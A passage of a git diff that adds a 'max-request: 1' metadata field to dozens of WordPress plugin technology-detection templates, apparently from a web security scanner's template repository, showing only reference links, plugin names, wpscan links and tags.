d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index dc3d446af3..41baa25eb7 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 96b4699d2d..ee389af6ec 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - 